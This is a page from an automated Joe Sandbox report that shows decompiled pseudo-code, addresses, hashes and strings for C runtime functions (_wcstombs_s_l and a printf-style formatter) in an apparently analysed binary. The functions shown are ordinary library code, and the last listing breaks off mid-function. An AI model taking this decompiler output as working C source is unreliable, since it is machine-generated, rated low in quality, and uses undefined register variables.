Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$9
API String ID: 3120068967-1823400153
Opcode ID: f2e347cc24461852637930abfeedb2ec017ca82321d772a47db0daaf0e0044b9
Instruction ID: e6ae8e1aee36ae899b5067b961b0336bcbb2e2f7483362bc6e9579d26b5b7545
Opcode Fuzzy Hash: f2e347cc24461852637930abfeedb2ec017ca82321d772a47db0daaf0e0044b9
Instruction Fuzzy Hash: 764136B1E101299FDF24CF48D841BAEB7B4FF85315F5040AAE188AB240C7789E81CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF13 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0041DF13(void* __edi) {
				signed int _t74;
				intOrPtr _t75;
				void* _t80;
				signed int _t84;
				void* _t92;
				void* _t97;
				signed int _t106;
				signed int _t108;
				signed int _t112;
				signed int _t113;
				intOrPtr _t114;
				signed int _t117;
				signed int _t119;
				signed int _t125;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t131;
				void* _t132;
				void* _t140;

				_t127 = __edi;
				_t113 =  *(_t129 + 0xc);
				 *_t113 = 0;
				if( *(_t129 + 0x10) != 0xffffffff &&  *(_t129 + 0x10) != 0x7fffffff &&  *(_t129 + 0x10) > 1) {
					_t140 =  *0x4bb4dc -  *(_t129 + 0x10) - 1; // 0xffffffff
					if(_t140 >= 0) {
						_t113 =  *(_t129 + 0x10) - 1;
						__eflags = _t113;
						 *(_t129 - 0x20) = _t113;
					} else {
						_t112 =  *0x4bb4dc; // 0xffffffff
						 *(_t129 - 0x20) = _t112;
					}
					E004116E0(_t127,  *(_t129 + 0xc) + 1, 0xfe,  *(_t129 - 0x20));
					_t131 = _t131 + 0xc;
				}
				if( *(_t129 + 8) != 0) {
					_t113 =  *(_t129 + 8);
					 *_t113 = 0;
				}
				if( *(_t129 + 0x18) <=  *(_t129 + 0x10)) {
					_t113 =  *(_t129 + 0x18);
					 *(_t129 - 0x24) = _t113;
				} else {
					 *(_t129 - 0x24) =  *(_t129 + 0x10);
				}
				 *(_t129 - 8) =  *(_t129 - 0x24);
				asm("sbb edx, edx");
				_t114 = _t113 + 1;
				 *((intOrPtr*)(_t129 - 0x14)) = _t114;
				if(_t114 == 0) {
					_push(L"bufferSize <= INT_MAX");
					_push(0);
					_push(0x13f);
					_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
					_push(2);
					_t92 = L0040C820();
					_t131 = _t131 + 0x14;
					if(_t92 == 1) {
						asm("int3");
					}
				}
				if( *((intOrPtr*)(_t129 - 0x14)) != 0) {
					_t100 =  *(_t129 + 0xc);
					_t74 = L0041D980( *(_t129 + 0xc),  *((intOrPtr*)(_t129 + 0x14)),  *(_t129 - 8),  *((intOrPtr*)(_t129 + 0x1c)));
					_t132 = _t131 + 0x10;
					 *(_t129 - 0xc) = _t74;
					__eflags =  *(_t129 - 0xc) - 0xffffffff;
					if( *(_t129 - 0xc) != 0xffffffff) {
						_t117 =  *(_t129 - 0xc) + 1;
						 *(_t129 - 0xc) = _t117;
						__eflags =  *(_t129 + 0xc);
						if( *(_t129 + 0xc) == 0) {
							L45:
							__eflags =  *(_t129 + 8);
							if( *(_t129 + 8) != 0) {
								 *( *(_t129 + 8)) =  *(_t129 - 0xc);
							}
							_t75 =  *((intOrPtr*)(_t129 - 4));
							goto L48;
						}
						__eflags =  *(_t129 - 0xc) -  *(_t129 + 0x10);
						if( *(_t129 - 0xc) <=  *(_t129 + 0x10)) {
							L44:
							_t119 =  *(_t129 + 0xc) +  *(_t129 - 0xc);
							__eflags = _t119;
							 *((char*)(_t119 - 1)) = 0;
							goto L45;
						}
						__eflags =  *(_t129 + 0x18) - 0xffffffff;
						if( *(_t129 + 0x18) == 0xffffffff) {
							L43:
							 *(_t129 - 0xc) =  *(_t129 + 0x10);
							 *((intOrPtr*)(_t129 - 4)) = 0x50;
							goto L44;
						}
						 *( *(_t129 + 0xc)) = 0;
						__eflags =  *(_t129 + 0x10) - 0xffffffff;
						if( *(_t129 + 0x10) != 0xffffffff) {
							__eflags =  *(_t129 + 0x10) - 0x7fffffff;
							if( *(_t129 + 0x10) != 0x7fffffff) {
								__eflags =  *(_t129 + 0x10) - 1;
								if( *(_t129 + 0x10) > 1) {
									__eflags =  *0x4bb4dc -  *(_t129 + 0x10) - 1; // 0xffffffff
									if(__eflags >= 0) {
										_t106 =  *(_t129 + 0x10) - 1;
										__eflags = _t106;
										 *(_t129 - 0x2c) = _t106;
									} else {
										_t84 =  *0x4bb4dc; // 0xffffffff
										 *(_t129 - 0x2c) = _t84;
									}
									_t117 =  *(_t129 - 0x2c);
									__eflags =  *(_t129 + 0xc) + 1;
									E004116E0(_t127,  *(_t129 + 0xc) + 1, 0xfe, _t117);
									_t132 = _t132 + 0xc;
								}
							}
						}
						_t104 =  *(_t129 + 0x10);
						__eflags =  *(_t129 - 0xc) -  *(_t129 + 0x10);
						asm("sbb edx, edx");
						 *(_t129 - 0x18) =  ~_t117;
						if( *(_t129 - 0xc) ==  *(_t129 + 0x10)) {
							_push(L"sizeInBytes > retsize");
							_push(0);
							_push(0x157);
							_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
							_push(2);
							_t80 = L0040C820();
							_t132 = _t132 + 0x14;
							__eflags = _t80 - 1;
							if(_t80 == 1) {
								asm("int3");
							}
						}
						__eflags =  *(_t129 - 0x18);
						if( *(_t129 - 0x18) != 0) {
							goto L43;
						} else {
							 *((intOrPtr*)(L00411810(_t104))) = 0x22;
							E0040C660(_t97, _t104, _t127, _t128, L"sizeInBytes > retsize", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x157, 0);
							_t75 = 0x22;
							goto L48;
						}
					} else {
						__eflags =  *(_t129 + 0xc);
						if( *(_t129 + 0xc) != 0) {
							 *( *(_t129 + 0xc)) = 0;
							__eflags =  *(_t129 + 0x10) - 0xffffffff;
							if( *(_t129 + 0x10) != 0xffffffff) {
								__eflags =  *(_t129 + 0x10) - 0x7fffffff;
								if( *(_t129 + 0x10) != 0x7fffffff) {
									__eflags =  *(_t129 + 0x10) - 1;
									if( *(_t129 + 0x10) > 1) {
										__eflags =  *0x4bb4dc -  *(_t129 + 0x10) - 1; // 0xffffffff
										if(__eflags >= 0) {
											_t125 =  *(_t129 + 0x10) - 1;
											__eflags = _t125;
											 *(_t129 - 0x28) = _t125;
										} else {
											_t108 =  *0x4bb4dc; // 0xffffffff
											 *(_t129 - 0x28) = _t108;
										}
										_t100 =  *(_t129 + 0xc) + 1;
										__eflags =  *(_t129 + 0xc) + 1;
										E004116E0(_t127,  *(_t129 + 0xc) + 1, 0xfe,  *(_t129 - 0x28));
									}
								}
							}
						}
						_t75 =  *((intOrPtr*)(L00411810(_t100)));
						L48:
						return _t75;
					}
				}
				 *((intOrPtr*)(L00411810(0x7fffffff))) = 0x16;
				E0040C660(_t97, 0x7fffffff, _t127, _t128, L"bufferSize <= INT_MAX", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x13f, 0);
				_t75 = 0x16;
				goto L48;
			}

0x0041df13
0x0041df13
0x0041df16
0x0041df1d
0x0041df34
0x0041df3a
0x0041df4a
0x0041df4a
0x0041df4d
0x0041df3c
0x0041df3c
0x0041df42
0x0041df42
0x0041df60
0x0041df65
0x0041df65
0x0041df6c
0x0041df6e
0x0041df71
0x0041df71
0x0041df7d
0x0041df87
0x0041df8a
0x0041df7f
0x0041df82
0x0041df82
0x0041df90
0x0041df9b
0x0041df9d
0x0041dfa0
0x0041dfa3
0x0041dfa5
0x0041dfaa
0x0041dfac
0x0041dfb1
0x0041dfb6
0x0041dfb8
0x0041dfbd
0x0041dfc3
0x0041dfc5
0x0041dfc5
0x0041dfc3
0x0041dfca
0x0041e00b
0x0041e00f
0x0041e014
0x0041e017
0x0041e01a
0x0041e01e
0x0041e08a
0x0041e08d
0x0041e090
0x0041e094
0x0041e181
0x0041e181
0x0041e185
0x0041e18d
0x0041e18d
0x0041e18f
0x00000000
0x0041e18f
0x0041e09d
0x0041e0a0
0x0041e177
0x0041e17a
0x0041e17a
0x0041e17d
0x00000000
0x0041e17d
0x0041e0a6
0x0041e0aa
0x0041e16a
0x0041e16d
0x0041e170
0x00000000
0x0041e170
0x0041e0b3
0x0041e0b6
0x0041e0ba
0x0041e0bc
0x0041e0c3
0x0041e0c5
0x0041e0c9
0x0041e0d1
0x0041e0d7
0x0041e0e6
0x0041e0e6
0x0041e0e9
0x0041e0d9
0x0041e0d9
0x0041e0de
0x0041e0de
0x0041e0ec
0x0041e0f8
0x0041e0fc
0x0041e101
0x0041e101
0x0041e0c9
0x0041e0c3
0x0041e104
0x0041e107
0x0041e10a
0x0041e10e
0x0041e111
0x0041e113
0x0041e118
0x0041e11a
0x0041e11f
0x0041e124
0x0041e126
0x0041e12b
0x0041e12e
0x0041e131
0x0041e133
0x0041e133
0x0041e131
0x0041e134
0x0041e138
0x00000000
0x0041e13a
0x0041e13f
0x0041e15b
0x0041e163
0x00000000
0x0041e163
0x0041e020
0x0041e020
0x0041e024
0x0041e029
0x0041e02c
0x0041e030
0x0041e032
0x0041e039
0x0041e03b
0x0041e03f
0x0041e047
0x0041e04d
0x0041e05d
0x0041e05d
0x0041e060
0x0041e04f
0x0041e04f
0x0041e055
0x0041e055
0x0041e06f
0x0041e06f
0x0041e073
0x0041e078
0x0041e03f
0x0041e039
0x0041e030
0x0041e080
0x0041e192
0x0041e195
0x0041e195
0x0041e01e
0x0041dfd1
0x0041dfed
0x0041dff5
0x00000000

APIs

_memset.LIBCMT ref: 0041DF60
__invalid_parameter.LIBCMTD ref: 0041DFED

Strings

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c, xrefs: 0041DFB1, 0041DFDE
bufferSize <= INT_MAX, xrefs: 0041DFA5, 0041DFE8
_wcstombs_s_l, xrefs: 0041DFE3

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __invalid_parameter_memset
String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
API String ID: 3961059608-322421350
Opcode ID: 4d80d1c9242061d319a8dab01ad2deea32d0558194d16c25058831dacbb52737
Instruction ID: c30d6438a6976c15c853d39ed67295e9f8e2d7395ec00b92584c19f5af74f325
Opcode Fuzzy Hash: 4d80d1c9242061d319a8dab01ad2deea32d0558194d16c25058831dacbb52737
Instruction Fuzzy Hash: 7B219FB0E40349DBCF24CF54CC41BEE7360BB44314F20462AF8266A2D1D7799AA2CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041DE85 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0041DE85(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _t85;
				intOrPtr _t86;
				void* _t91;
				signed int _t95;
				void* _t103;
				void* _t110;
				void* _t111;
				void* _t112;
				signed int _t121;
				signed int _t123;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				signed int _t132;
				signed int _t134;
				signed int _t140;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t146;
				void* _t147;

				_t143 = __esi;
				_t142 = __edi;
				_t112 = __ecx;
				_t111 = __ebx;
				if( *(_t144 + 0x10) > 0 ||  *(_t144 + 0xc) == 0 &&  *(_t144 + 0x10) == 0) {
					 *((intOrPtr*)(_t144 - 0x1c)) = 1;
				} else {
					 *((intOrPtr*)(_t144 - 0x1c)) = 0;
				}
				 *((intOrPtr*)(_t144 - 0x10)) =  *((intOrPtr*)(_t144 - 0x1c));
				if( *((intOrPtr*)(_t144 - 0x10)) == 0) {
					_push(L"(dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)");
					_push(0);
					_push(0x133);
					_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
					_push(2);
					_t110 = L0040C820();
					_t146 = _t146 + 0x14;
					if(_t110 == 1) {
						asm("int3");
					}
				}
				if( *((intOrPtr*)(_t144 - 0x10)) != 0) {
					__eflags =  *(_t144 + 0xc);
					if( *(_t144 + 0xc) != 0) {
						_t128 =  *(_t144 + 0xc);
						 *_t128 = 0;
						__eflags =  *(_t144 + 0x10) - 0xffffffff;
						if( *(_t144 + 0x10) != 0xffffffff) {
							__eflags =  *(_t144 + 0x10) - 0x7fffffff;
							if( *(_t144 + 0x10) != 0x7fffffff) {
								__eflags =  *(_t144 + 0x10) - 1;
								if( *(_t144 + 0x10) > 1) {
									__eflags =  *0x4bb4dc -  *(_t144 + 0x10) - 1; // 0xffffffff
									if(__eflags >= 0) {
										_t128 =  *(_t144 + 0x10) - 1;
										__eflags = _t128;
										 *(_t144 - 0x20) = _t128;
									} else {
										_t127 =  *0x4bb4dc; // 0xffffffff
										 *(_t144 - 0x20) = _t127;
									}
									_t126 =  *(_t144 + 0xc) + 1;
									__eflags =  *(_t144 + 0xc) + 1;
									E004116E0(_t142, _t126, 0xfe,  *(_t144 - 0x20));
									_t146 = _t146 + 0xc;
								}
							}
						}
					}
					__eflags =  *(_t144 + 8);
					if( *(_t144 + 8) != 0) {
						_t128 =  *(_t144 + 8);
						 *_t128 = 0;
					}
					__eflags =  *(_t144 + 0x18) -  *(_t144 + 0x10);
					if( *(_t144 + 0x18) <=  *(_t144 + 0x10)) {
						_t128 =  *(_t144 + 0x18);
						 *(_t144 - 0x24) = _t128;
					} else {
						 *(_t144 - 0x24) =  *(_t144 + 0x10);
					}
					 *(_t144 - 8) =  *(_t144 - 0x24);
					__eflags = 0x7fffffff -  *(_t144 - 8);
					asm("sbb edx, edx");
					_t129 = _t128 + 1;
					__eflags = _t129;
					 *(_t144 - 0x14) = _t129;
					if(_t129 == 0) {
						_push(L"bufferSize <= INT_MAX");
						_push(0);
						_push(0x13f);
						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
						_push(2);
						_t103 = L0040C820();
						_t146 = _t146 + 0x14;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							asm("int3");
						}
					}
					__eflags =  *(_t144 - 0x14);
					if( *(_t144 - 0x14) != 0) {
						_t115 =  *(_t144 + 0xc);
						_t85 = L0041D980( *(_t144 + 0xc),  *((intOrPtr*)(_t144 + 0x14)),  *(_t144 - 8),  *((intOrPtr*)(_t144 + 0x1c)));
						_t147 = _t146 + 0x10;
						 *(_t144 - 0xc) = _t85;
						__eflags =  *(_t144 - 0xc) - 0xffffffff;
						if( *(_t144 - 0xc) != 0xffffffff) {
							_t132 =  *(_t144 - 0xc) + 1;
							 *(_t144 - 0xc) = _t132;
							__eflags =  *(_t144 + 0xc);
							if( *(_t144 + 0xc) == 0) {
								L56:
								__eflags =  *(_t144 + 8);
								if( *(_t144 + 8) != 0) {
									 *( *(_t144 + 8)) =  *(_t144 - 0xc);
								}
								_t86 =  *((intOrPtr*)(_t144 - 4));
								goto L59;
							}
							__eflags =  *(_t144 - 0xc) -  *(_t144 + 0x10);
							if( *(_t144 - 0xc) <=  *(_t144 + 0x10)) {
								L55:
								_t134 =  *(_t144 + 0xc) +  *(_t144 - 0xc);
								__eflags = _t134;
								 *((char*)(_t134 - 1)) = 0;
								goto L56;
							}
							__eflags =  *(_t144 + 0x18) - 0xffffffff;
							if( *(_t144 + 0x18) == 0xffffffff) {
								L54:
								 *(_t144 - 0xc) =  *(_t144 + 0x10);
								 *((intOrPtr*)(_t144 - 4)) = 0x50;
								goto L55;
							}
							 *( *(_t144 + 0xc)) = 0;
							__eflags =  *(_t144 + 0x10) - 0xffffffff;
							if( *(_t144 + 0x10) != 0xffffffff) {
								__eflags =  *(_t144 + 0x10) - 0x7fffffff;
								if( *(_t144 + 0x10) != 0x7fffffff) {
									__eflags =  *(_t144 + 0x10) - 1;
									if( *(_t144 + 0x10) > 1) {
										__eflags =  *0x4bb4dc -  *(_t144 + 0x10) - 1; // 0xffffffff
										if(__eflags >= 0) {
											_t121 =  *(_t144 + 0x10) - 1;
											__eflags = _t121;
											 *(_t144 - 0x2c) = _t121;
										} else {
											_t95 =  *0x4bb4dc; // 0xffffffff
											 *(_t144 - 0x2c) = _t95;
										}
										_t132 =  *(_t144 - 0x2c);
										_t93 =  *(_t144 + 0xc) + 1;
										__eflags =  *(_t144 + 0xc) + 1;
										E004116E0(_t142, _t93, 0xfe, _t132);
										_t147 = _t147 + 0xc;
									}
								}
							}
							_t119 =  *(_t144 + 0x10);
							__eflags =  *(_t144 - 0xc) -  *(_t144 + 0x10);
							asm("sbb edx, edx");
							 *(_t144 - 0x18) =  ~_t132;
							if( *(_t144 - 0xc) ==  *(_t144 + 0x10)) {
								_push(L"sizeInBytes > retsize");
								_push(0);
								_push(0x157);
								_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
								_push(2);
								_t91 = L0040C820();
								_t147 = _t147 + 0x14;
								__eflags = _t91 - 1;
								if(_t91 == 1) {
									asm("int3");
								}
							}
							__eflags =  *(_t144 - 0x18);
							if( *(_t144 - 0x18) != 0) {
								goto L54;
							} else {
								 *((intOrPtr*)(L00411810(_t119))) = 0x22;
								E0040C660(_t111, _t119, _t142, _t143, L"sizeInBytes > retsize", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x157, 0);
								_t86 = 0x22;
								goto L59;
							}
						} else {
							__eflags =  *(_t144 + 0xc);
							if( *(_t144 + 0xc) != 0) {
								 *( *(_t144 + 0xc)) = 0;
								__eflags =  *(_t144 + 0x10) - 0xffffffff;
								if( *(_t144 + 0x10) != 0xffffffff) {
									__eflags =  *(_t144 + 0x10) - 0x7fffffff;
									if( *(_t144 + 0x10) != 0x7fffffff) {
										__eflags =  *(_t144 + 0x10) - 1;
										if( *(_t144 + 0x10) > 1) {
											__eflags =  *0x4bb4dc -  *(_t144 + 0x10) - 1; // 0xffffffff
											if(__eflags >= 0) {
												_t140 =  *(_t144 + 0x10) - 1;
												__eflags = _t140;
												 *(_t144 - 0x28) = _t140;
											} else {
												_t123 =  *0x4bb4dc; // 0xffffffff
												 *(_t144 - 0x28) = _t123;
											}
											_t115 =  *(_t144 + 0xc) + 1;
											__eflags =  *(_t144 + 0xc) + 1;
											E004116E0(_t142, _t115, 0xfe,  *(_t144 - 0x28));
										}
									}
								}
							}
							_t86 =  *((intOrPtr*)(L00411810(_t115)));
							goto L59;
						}
					} else {
						 *((intOrPtr*)(L00411810(0x7fffffff))) = 0x16;
						E0040C660(_t111, 0x7fffffff, _t142, _t143, L"bufferSize <= INT_MAX", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x13f, 0);
						_t86 = 0x16;
						goto L59;
					}
				} else {
					 *((intOrPtr*)(L00411810(_t112))) = 0x16;
					E0040C660(_t111, _t112, _t142, _t143, L"(dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x133, 0);
					_t86 = 0x16;
					L59:
					return _t86;
				}
			}

0x0041de85
0x0041de85
0x0041de85
0x0041de85
0x0041de89
0x0041dea0
0x0041de97
0x0041de97
0x0041de97
0x0041deaa
0x0041deb1
0x0041deb3
0x0041deb8
0x0041deba
0x0041debf
0x0041dec4
0x0041dec6
0x0041decb
0x0041ded1
0x0041ded3
0x0041ded3
0x0041ded1
0x0041ded8
0x0041df0d
0x0041df11
0x0041df13
0x0041df16
0x0041df19
0x0041df1d
0x0041df1f
0x0041df26
0x0041df28
0x0041df2c
0x0041df34
0x0041df3a
0x0041df4a
0x0041df4a
0x0041df4d
0x0041df3c
0x0041df3c
0x0041df42
0x0041df42
0x0041df5c
0x0041df5c
0x0041df60
0x0041df65
0x0041df65
0x0041df2c
0x0041df26
0x0041df1d
0x0041df68
0x0041df6c
0x0041df6e
0x0041df71
0x0041df71
0x0041df7a
0x0041df7d
0x0041df87
0x0041df8a
0x0041df7f
0x0041df82
0x0041df82
0x0041df90
0x0041df98
0x0041df9b
0x0041df9d
0x0041df9d
0x0041dfa0
0x0041dfa3
0x0041dfa5
0x0041dfaa
0x0041dfac
0x0041dfb1
0x0041dfb6
0x0041dfb8
0x0041dfbd
0x0041dfc0
0x0041dfc3
0x0041dfc5
0x0041dfc5
0x0041dfc3
0x0041dfc6
0x0041dfca
0x0041e00b
0x0041e00f
0x0041e014
0x0041e017
0x0041e01a
0x0041e01e
0x0041e08a
0x0041e08d
0x0041e090
0x0041e094
0x0041e181
0x0041e181
0x0041e185
0x0041e18d
0x0041e18d
0x0041e18f
0x00000000
0x0041e18f
0x0041e09d
0x0041e0a0
0x0041e177
0x0041e17a
0x0041e17a
0x0041e17d
0x00000000
0x0041e17d
0x0041e0a6
0x0041e0aa
0x0041e16a
0x0041e16d
0x0041e170
0x00000000
0x0041e170
0x0041e0b3
0x0041e0b6
0x0041e0ba
0x0041e0bc
0x0041e0c3
0x0041e0c5
0x0041e0c9
0x0041e0d1
0x0041e0d7
0x0041e0e6
0x0041e0e6
0x0041e0e9
0x0041e0d9
0x0041e0d9
0x0041e0de
0x0041e0de
0x0041e0ec
0x0041e0f8
0x0041e0f8
0x0041e0fc
0x0041e101
0x0041e101
0x0041e0c9
0x0041e0c3
0x0041e104
0x0041e107
0x0041e10a
0x0041e10e
0x0041e111
0x0041e113
0x0041e118
0x0041e11a
0x0041e11f
0x0041e124
0x0041e126
0x0041e12b
0x0041e12e
0x0041e131
0x0041e133
0x0041e133
0x0041e131
0x0041e134
0x0041e138
0x00000000
0x0041e13a
0x0041e13f
0x0041e15b
0x0041e163
0x00000000
0x0041e163
0x0041e020
0x0041e020
0x0041e024
0x0041e029
0x0041e02c
0x0041e030
0x0041e032
0x0041e039
0x0041e03b
0x0041e03f
0x0041e047
0x0041e04d
0x0041e05d
0x0041e05d
0x0041e060
0x0041e04f
0x0041e04f
0x0041e055
0x0041e055
0x0041e06f
0x0041e06f
0x0041e073
0x0041e078
0x0041e03f
0x0041e039
0x0041e030
0x0041e080
0x00000000
0x0041e080
0x0041dfcc
0x0041dfd1
0x0041dfed
0x0041dff5
0x00000000
0x0041dff5
0x0041deda
0x0041dedf
0x0041defb
0x0041df03
0x0041e192
0x0041e195
0x0041e195

APIs

__invalid_parameter.LIBCMTD ref: 0041DEFB

Strings

(dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0), xrefs: 0041DEB3, 0041DEF6
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c, xrefs: 0041DEBF, 0041DEEC
u!hn@, xrefs: 0041DEB1
_wcstombs_s_l, xrefs: 0041DEF1

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __invalid_parameter
String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$u!hn@
API String ID: 3730194576-3624146517
Opcode ID: bf95ed562cd311684d0cca39613c9602787263eab27b4cdca790d46dbd8851c0
Instruction ID: 681148f6bc45dca79e85750f17f7327829119ccbff824fce2135f10082f280dd
Opcode Fuzzy Hash: bf95ed562cd311684d0cca39613c9602787263eab27b4cdca790d46dbd8851c0
Instruction Fuzzy Hash: 3F0112B4D807199AEB20AE41CC067EF7661AB2071AF11452BE516392C1C3FD46A5CADD

Uniqueness

Uniqueness Score: -1.00%

Function 00423856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00423856() {
				signed int _t483;
				void* _t488;
				signed int _t490;
				void* _t498;
				intOrPtr _t501;
				signed int _t519;
				intOrPtr _t523;
				intOrPtr _t524;
				signed int _t525;
				void* _t527;

				L0:
				while(1) {
					L0:
					 *(_t525 - 0x30) = 8;
					while(1) {
						L143:
						 *(__ebp - 0x460) = 7;
						while(1) {
							L145:
							 *(__ebp - 8) = 0x10;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
							__eflags =  *(__ebp - 0x10) & 0x00000080;
							if(( *(__ebp - 0x10) & 0x00000080) != 0) {
								__edx = 0x30;
								 *(__ebp - 0x14) = __dx;
								 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
								__eflags =  *(__ebp - 0x460) + 0x51;
								 *(__ebp - 0x12) = __ax;
								 *(__ebp - 0x1c) = 2;
							}
							while(1) {
								L150:
								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
								__eflags =  *(__ebp - 0x10) & 0x00008000;
								if(( *(__ebp - 0x10) & 0x00008000) == 0) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
									__eflags =  *(__ebp - 0x10) & 0x00001000;
									if(( *(__ebp - 0x10) & 0x00001000) == 0) {
										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
										__eflags =  *(__ebp - 0x10) & 0x00000020;
										if(( *(__ebp - 0x10) & 0x00000020) == 0) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
											__eflags =  *(__ebp - 0x10) & 0x00000040;
											if(( *(__ebp - 0x10) & 0x00000040) == 0) {
												__ecx = __ebp + 0x14;
												__eax = E0041F270(__ebp + 0x14);
												__edx = 0;
												__eflags = 0;
												 *(__ebp - 0x4a0) = __eax;
												 *(__ebp - 0x49c) = 0;
											} else {
												__eax = __ebp + 0x14;
												__eax = E0041F270(__ebp + 0x14);
												asm("cdq");
												 *(__ebp - 0x4a0) = __eax;
												 *(__ebp - 0x49c) = __edx;
											}
										} else {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
											__eflags =  *(__ebp - 0x10) & 0x00000040;
											if(( *(__ebp - 0x10) & 0x00000040) == 0) {
												__ecx = __ebp + 0x14;
												E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
												asm("cdq");
												 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
												 *(__ebp - 0x49c) = __edx;
											} else {
												__eax = __ebp + 0x14;
												__eax = E0041F270(__ebp + 0x14);
												__ax = __eax;
												asm("cdq");
												 *(__ebp - 0x4a0) = __eax;
												 *(__ebp - 0x49c) = __edx;
											}
										}
									} else {
										__eax = __ebp + 0x14;
										 *(__ebp - 0x4a0) = E0041F290(__ebp + 0x14);
										 *(__ebp - 0x49c) = __edx;
									}
								} else {
									__ecx = __ebp + 0x14;
									 *(__ebp - 0x4a0) = E0041F290(__ebp + 0x14);
									 *(__ebp - 0x49c) = __edx;
								}
								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
								__eflags =  *(__ebp - 0x10) & 0x00000040;
								if(( *(__ebp - 0x10) & 0x00000040) == 0) {
									goto L167;
								}
								L163:
								__eflags =  *(__ebp - 0x49c);
								if(__eflags > 0) {
									goto L167;
								}
								L164:
								if(__eflags < 0) {
									L166:
									 *(__ebp - 0x4a0) =  ~( *(__ebp - 0x4a0));
									__edx =  *(__ebp - 0x49c);
									asm("adc edx, 0x0");
									__edx =  ~( *(__ebp - 0x49c));
									 *(__ebp - 0x4a8) =  ~( *(__ebp - 0x4a0));
									 *(__ebp - 0x4a4) =  ~( *(__ebp - 0x49c));
									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
									L168:
